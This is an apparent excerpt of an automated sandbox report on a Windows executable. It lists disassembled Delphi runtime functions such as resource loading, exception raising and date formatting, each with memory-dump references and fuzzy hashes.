                                                                                                  • LoadResource.KERNEL32(00000000,00000000,00000000,DESCRIPTION,0000000A,00000000,5002A8C5,?,00000000,5002A8E2), ref: 5002A85C
                                                                                                  • LockResource.KERNEL32(00000000,00000000,5002A8A1,?,00000000,00000000,00000000,DESCRIPTION,0000000A,00000000,5002A8C5,?,00000000,5002A8E2), ref: 5002A87C
                                                                                                  • @System@@UStrFromPWChar$qqrr20System@UnicodeStringpb.RTL120(00000000,00000000,5002A8A1,?,00000000,00000000,00000000,DESCRIPTION,0000000A,00000000,5002A8C5,?,00000000,5002A8E2), ref: 5002A885
                                                                                                  • FreeResource.KERNEL32(00000000,5002A8A8,?,00000000,00000000,00000000,DESCRIPTION,0000000A,00000000,5002A8C5,?,00000000,5002A8E2), ref: 5002A89B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$Resource$Open$LoadSystem@@Unicode$ErrorModuleQueryStringSysutils@Value$Asg$qqrr20Char$qqrr20CloseExcept$qqrvException@$bctr$qqrp20FileFindFreeFromHandleLastLibraryLockMessage$qqruiModule$qqrpboNameRaiseRecpx14RecxiStringpbStringx20
                                                                                                  • String ID: DESCRIPTION
                                                                                                  • API String ID: 3160456903-3773289166
                                                                                                  • Opcode ID: 9c728f30882331a281c9099e372204b5d02cfbfa5d2dcb8aba3413716321baf8
                                                                                                  • Instruction ID: 2fbb488c572c727051016de5f65cec4f5785d2b5e39462af3f2b4d4cfef47028
                                                                                                  • Opcode Fuzzy Hash: 9c728f30882331a281c9099e372204b5d02cfbfa5d2dcb8aba3413716321baf8
                                                                                                  • Instruction Fuzzy Hash: 2731A270A062D9AFEB05CFF4EC55B9DB7F9EB1A304F9045A6F500A3242DE385A40C7A0
                                                                                                  Function 5002D988 Relevance: 25.6, APIs: 17, Instructions: 135COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,5002DB19,?,00000000), ref: 5002D9D3
                                                                                                    • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                    • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120(00000000,5002DB19,?,00000000), ref: 5002D9CE
                                                                                                    • Part of subcall function 500266E0: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500266EA
                                                                                                    • Part of subcall function 500266E0: @System@LoadResString$qqrp20System@TResStringRec.RTL120(?,500A6B50,00000000,5002A97D,00000000,5002A99F,?,00000000), ref: 500266FA
                                                                                                    • Part of subcall function 500266E0: @System@@AfterConstruction$qqrp14System@TObject.RTL120(?,500A6B50,00000000,5002A97D,00000000,5002A99F,?,00000000), ref: 50026705
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,00000000,5002DB19,?,00000000), ref: 5002D9F7
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,?,00000000,5002DB19,?,00000000), ref: 5002D9FC
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,00000000,5002DB19,?,00000000), ref: 5002DA1F
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,?,00000000,5002DB19,?,00000000), ref: 5002DA24
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002DB19,?,00000000), ref: 5002DA41
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,00000000,5002DB19,?,00000000), ref: 5002DA70
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,?,00000000,5002DB19,?,00000000), ref: 5002DA75
                                                                                                  • @System@@DynArrayLength$qqrv.RTL120(00000000,5002DB19,?,00000000), ref: 5002DA7F
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,00000000,5002DB19,?,00000000), ref: 5002DAAA
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,?,00000000,5002DB19,?,00000000), ref: 5002DAAF
                                                                                                  • @Sysutils@TEncoding@GetByteCount$qqrx20System@UnicodeStringii.RTL120(5002D963,00000000,?,00000000,5002DB19,?,00000000), ref: 5002DABD
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120(5002D963,00000000,?,00000000,5002DB19,?,00000000), ref: 5002DAD8
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(5002D963,00000000,?,00000000,5002DB19,?,00000000), ref: 5002DADD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$System@@$String$RaiseSysutils@$Except$qqrvException@$bctr$qqrp20$Recpx14Recxi$Unicode$AfterAnsiArrayByteClassClassoConstruction$qqrp14Count$qqrx20Create$qqrp17Encoding@Error$qqrucFromInternalLength$qqrvList$qqrvLoadMetaObjectStr$qqrr20String$qqrp20StringiiStringx27System@%T$us$i0$%
                                                                                                  • String ID:
                                                                                                  • API String ID: 1510222668-0
                                                                                                  • Opcode ID: 04cde6b8ab52445afbce40d0579e5524d879601997f477b20f500470919b9e46
                                                                                                  • Instruction ID: c200511c8af83f716f27c4f8f74ee48d0f5db12a54d239dde748c8e376a153b6
                                                                                                  • Opcode Fuzzy Hash: 04cde6b8ab52445afbce40d0579e5524d879601997f477b20f500470919b9e46
                                                                                                  • Instruction Fuzzy Hash: 1551A330A065869FDB10DFA8ED91AAEB7F9EF54304F508266F904D7351CB70AE01CBA1
                                                                                                  Function 5002D778 Relevance: 25.6, APIs: 17, Instructions: 120COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(?,?), ref: 5002D7AB
                                                                                                    • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                    • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120(?,?), ref: 5002D7A6
                                                                                                    • Part of subcall function 500266E0: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500266EA
                                                                                                    • Part of subcall function 500266E0: @System@LoadResString$qqrp20System@TResStringRec.RTL120(?,500A6B50,00000000,5002A97D,00000000,5002A99F,?,00000000), ref: 500266FA
                                                                                                    • Part of subcall function 500266E0: @System@@AfterConstruction$qqrp14System@TObject.RTL120(?,500A6B50,00000000,5002A97D,00000000,5002A99F,?,00000000), ref: 50026705
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120(?,?), ref: 5002D7C9
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(?,?), ref: 5002D7CE
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,00000000,?,?), ref: 5002D7F1
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,00000000,?,?), ref: 5002D7F6
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,00000000,?,?), ref: 5002D819
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,00000000,?,?), ref: 5002D81E
                                                                                                  • @System@@DynArrayLength$qqrv.RTL120(?,?), ref: 5002D826
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,00000000,?,?), ref: 5002D84B
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,00000000,?,?), ref: 5002D850
                                                                                                  • @System@@DynArrayLength$qqrv.RTL120(?,?), ref: 5002D85A
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,00000000,?,?), ref: 5002D885
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,00000000,?,?), ref: 5002D88A
                                                                                                  • @Sysutils@TEncoding@GetByteCount$qqrx24System@%DynamicArray$tb%ii.RTL120(5002D771,00000000,00000000,?,?), ref: 5002D898
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120(5002D771,00000000,00000000,?,?), ref: 5002D8B3
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(5002D771,00000000,00000000,?,?), ref: 5002D8B8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$System@@$RaiseStringSysutils@$Except$qqrvException@$bctr$qqrp20$Recpx14Recxi$ArrayLength$qqrv$AfterArray$tb%iiByteClassClassoConstruction$qqrp14Count$qqrx24Create$qqrp17DynamicEncoding@Error$qqrucList$qqrvLoadMetaObjectString$qqrp20System@%
                                                                                                  • String ID:
                                                                                                  • API String ID: 1237184820-0
                                                                                                  • Opcode ID: 952b74f017d3762d293e9f3b11fffa3ac327c9001284a9ce47d9ecc3364eade9
                                                                                                  • Instruction ID: a3c714428ec61206f39ef323b742ab525dddacf128d87db4c55a7e7c244486e1
                                                                                                  • Opcode Fuzzy Hash: 952b74f017d3762d293e9f3b11fffa3ac327c9001284a9ce47d9ecc3364eade9
                                                                                                  • Instruction Fuzzy Hash: E2416F30E0658A9FDB10DFD8FD85AAEB7B9AF54304F10425AF90497352DB71AE01CBA1
                                                                                                  Function 5002DD38 Relevance: 24.1, APIs: 16, Instructions: 112COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120 ref: 5002DD6B
                                                                                                    • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                    • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120 ref: 5002DD66
                                                                                                    • Part of subcall function 500266E0: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500266EA
                                                                                                    • Part of subcall function 500266E0: @System@LoadResString$qqrp20System@TResStringRec.RTL120(?,500A6B50,00000000,5002A97D,00000000,5002A99F,?,00000000), ref: 500266FA
                                                                                                    • Part of subcall function 500266E0: @System@@AfterConstruction$qqrp14System@TObject.RTL120(?,500A6B50,00000000,5002A97D,00000000,5002A99F,?,00000000), ref: 50026705
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?), ref: 5002DD8E
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,?), ref: 5002DD93
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?), ref: 5002DDB6
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,?), ref: 5002DDBB
                                                                                                  • @System@@DynArrayLength$qqrv.RTL120 ref: 5002DDC3
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?), ref: 5002DDE8
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,?), ref: 5002DDED
                                                                                                  • @Sysutils@TEncoding@GetCharCount$qqrx25System@%DynamicArray$tuc%ii.RTL120(?), ref: 5002DDFB
                                                                                                  • @System@@DynArrayLength$qqrv.RTL120(?), ref: 5002DE0C
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,?), ref: 5002DE2F
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,?,?), ref: 5002DE34
                                                                                                  • @System@@DynArrayLength$qqrv.RTL120(00000000,?,?), ref: 5002DE3E
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120(00000000,?,?), ref: 5002DE59
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,?,?), ref: 5002DE5E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$System@@$RaiseStringSysutils@$Except$qqrvException@$bctr$qqrp20$Recpx14Recxi$ArrayLength$qqrv$AfterArray$tuc%iiCharClassClassoConstruction$qqrp14Count$qqrx25Create$qqrp17DynamicEncoding@Error$qqrucList$qqrvLoadMetaObjectString$qqrp20System@%
                                                                                                  • String ID:
                                                                                                  • API String ID: 599856924-0
                                                                                                  • Opcode ID: 4b8d796bfac4fa0ae40b9c02b7f6622a5a3d8938baecce40c243d743d60e7c27
                                                                                                  • Instruction ID: 7c7a2039e6845435a2d692603e14150ae7f22c60f5061fde4fa10c9b3cf0b75a
                                                                                                  • Opcode Fuzzy Hash: 4b8d796bfac4fa0ae40b9c02b7f6622a5a3d8938baecce40c243d743d60e7c27
                                                                                                  • Instruction Fuzzy Hash: CB416430A025869BDB10DF98FD91AAEB7B9AF54304F50415AF9049B352CB71AE05CBA1
                                                                                                  Function 500236AC Relevance: 22.6, APIs: 15, Instructions: 107threadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50023814), ref: 500236D8
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50023814), ref: 50023706
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000200,00000000,50023814), ref: 5002371A
                                                                                                  • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000200,00000000,50023814), ref: 50023726
                                                                                                  • GetDateFormatW.KERNEL32(00000000,00000004,?,00000000,?,00000200,00000000,50023814), ref: 5002372C
                                                                                                  • @System@@UStrFromWArray$qqrr20System@UnicodeStringpbi.RTL120(00000000,00000004,?,00000000,?,00000200,00000000,50023814), ref: 50023746
                                                                                                  • @Sysutils@CharToByteLen$qqrx20System@UnicodeStringi.RTL120(?,00000000,00000004,?,00000000,?,00000200,00000000,50023814), ref: 5002376D
                                                                                                  • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,00000004,?,00000000,?,00000200,00000000,50023814), ref: 5002377B
                                                                                                    • Part of subcall function 5000A464: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000A525), ref: 5000A4A0
                                                                                                    • Part of subcall function 5000A464: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,5000A525), ref: 5000A4F9
                                                                                                  • @Sysutils@ByteToCharLen$qqrx20System@UnicodeStringi.RTL120(00000000,00000004,?,00000000,?,00000200,00000000,50023814), ref: 500237A6
                                                                                                  • @Sysutils@CharToByteIndex$qqrx20System@UnicodeStringi.RTL120(00000000,00000004,?,00000000,?,00000200,00000000,50023814), ref: 500237B7
                                                                                                  • @System@@UStrFromPWChar$qqrr20System@UnicodeStringpb.RTL120(00000000,00000004,?,00000000,?,00000200,00000000,50023814), ref: 500237D3
                                                                                                  • @Sysutils@CharToByteLen$qqrx20System@UnicodeStringi.RTL120(00000000,00000004,?,00000000,?,00000200,00000000,50023814), ref: 500237E3
                                                                                                  • @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,00000004,?,00000000,?,00000200,00000000,50023814), ref: 500237EE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@Unicode$System@@$Char$From$ByteStringStringiSysutils@$Len$qqrx20Stringpbi$Asg$qqrr20Len$qqrr20Stringx20$AnsiArray$qqrr20Char$qqrr20Char$qqrx20Copy$qqrx20DateFormatIndex$qqrx20InternalLocaleStr$qqrr20StringiiStringpbStringx27System@%T$us$i0$%Thread
                                                                                                  • String ID:
                                                                                                  • API String ID: 3483906196-0
                                                                                                  • Opcode ID: 07ec6dc5ae61966c67d195a7f413b0f24ab838b4146774390f1e3ff9206560d6
                                                                                                  • Instruction ID: 4f9631fb190bdf22358dadba8d9e4bcdbf434579e9ae2086efaa57f8c8f505f9
                                                                                                  • Opcode Fuzzy Hash: 07ec6dc5ae61966c67d195a7f413b0f24ab838b4146774390f1e3ff9206560d6
                                                                                                  • Instruction Fuzzy Hash: 7231A274A461998FEF20DBA8E89569DB3F4EF18300F5042A6F808E7315DA34DE01CBD1
                                                                                                  Function 500229F4 Relevance: 22.6, APIs: 15, Instructions: 107threadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50022B5C), ref: 50022A20
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50022B5C), ref: 50022A4E
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000100,00000000,50022B5C), ref: 50022A62
                                                                                                  • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,50022B5C), ref: 50022A6E
                                                                                                  • GetDateFormatW.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,50022B5C), ref: 50022A74
                                                                                                  • @System@@UStrFromWArray$qqrr20System@UnicodeStringpbi.RTL120(00000000,00000004,?,00000000,?,00000100,00000000,50022B5C), ref: 50022A8E
                                                                                                  • @Sysutils@CharToByteLen$qqrx20System@UnicodeStringi.RTL120(?,00000000,00000004,?,00000000,?,00000100,00000000,50022B5C), ref: 50022AB5
                                                                                                  • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,00000004,?,00000000,?,00000100,00000000,50022B5C), ref: 50022AC3
                                                                                                    • Part of subcall function 5000A464: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000A525), ref: 5000A4A0
                                                                                                    • Part of subcall function 5000A464: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,5000A525), ref: 5000A4F9
                                                                                                  • @Sysutils@ByteToCharLen$qqrx20System@UnicodeStringi.RTL120(00000000,00000004,?,00000000,?,00000100,00000000,50022B5C), ref: 50022AEE
                                                                                                  • @Sysutils@CharToByteIndex$qqrx20System@UnicodeStringi.RTL120(00000000,00000004,?,00000000,?,00000100,00000000,50022B5C), ref: 50022AFF
                                                                                                  • @System@@UStrFromPWChar$qqrr20System@UnicodeStringpb.RTL120(00000000,00000004,?,00000000,?,00000100,00000000,50022B5C), ref: 50022B1B
                                                                                                  • @Sysutils@CharToByteLen$qqrx20System@UnicodeStringi.RTL120(00000000,00000004,?,00000000,?,00000100,00000000,50022B5C), ref: 50022B2B
                                                                                                  • @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,00000004,?,00000000,?,00000100,00000000,50022B5C), ref: 50022B36
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@Unicode$System@@$Char$From$ByteStringStringiSysutils@$Len$qqrx20Stringpbi$Asg$qqrr20Len$qqrr20Stringx20$AnsiArray$qqrr20Char$qqrr20Char$qqrx20Copy$qqrx20DateFormatIndex$qqrx20InternalLocaleStr$qqrr20StringiiStringpbStringx27System@%T$us$i0$%Thread
                                                                                                  • String ID:
                                                                                                  • API String ID: 3483906196-0
                                                                                                  • Opcode ID: 14b31e75bbe4f29b0344d47f151fd9c0e418cd3dfaf5d63b438e38d57a2d97fd
                                                                                                  • Instruction ID: 53e8520a94321b9216bfb608fab58842445848e9737d4ff382ae0df39ef9d34b
                                                                                                  • Opcode Fuzzy Hash: 14b31e75bbe4f29b0344d47f151fd9c0e418cd3dfaf5d63b438e38d57a2d97fd
                                                                                                  • Instruction Fuzzy Hash: EA31B234A425999FDB11DFA8E89569DB3F4EF18300F5042A6F808E7315DB349E02CBD2
                                                                                                  Function 5001C70C Relevance: 21.2, APIs: 14, Instructions: 161COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C8D4), ref: 5001C84D
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C8D4), ref: 5001C749
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C8D4), ref: 5001C774
                                                                                                  • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,5001C8D4), ref: 5001C79A
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C8D4), ref: 5001C7BC
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C8D4), ref: 5001C7E7
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C8D4), ref: 5001C813
                                                                                                  • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,5001C8D4), ref: 5001C866
                                                                                                  • @System@@UStrLen$qqrx20System@UnicodeString.RTL120(00000000,5001C8D4), ref: 5001C86B
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C8D4), ref: 5001C891
                                                                                                  • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,5001C8D4), ref: 5001C8AD
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001C8D4), ref: 5001C8B9
                                                                                                  Memory Dump Source
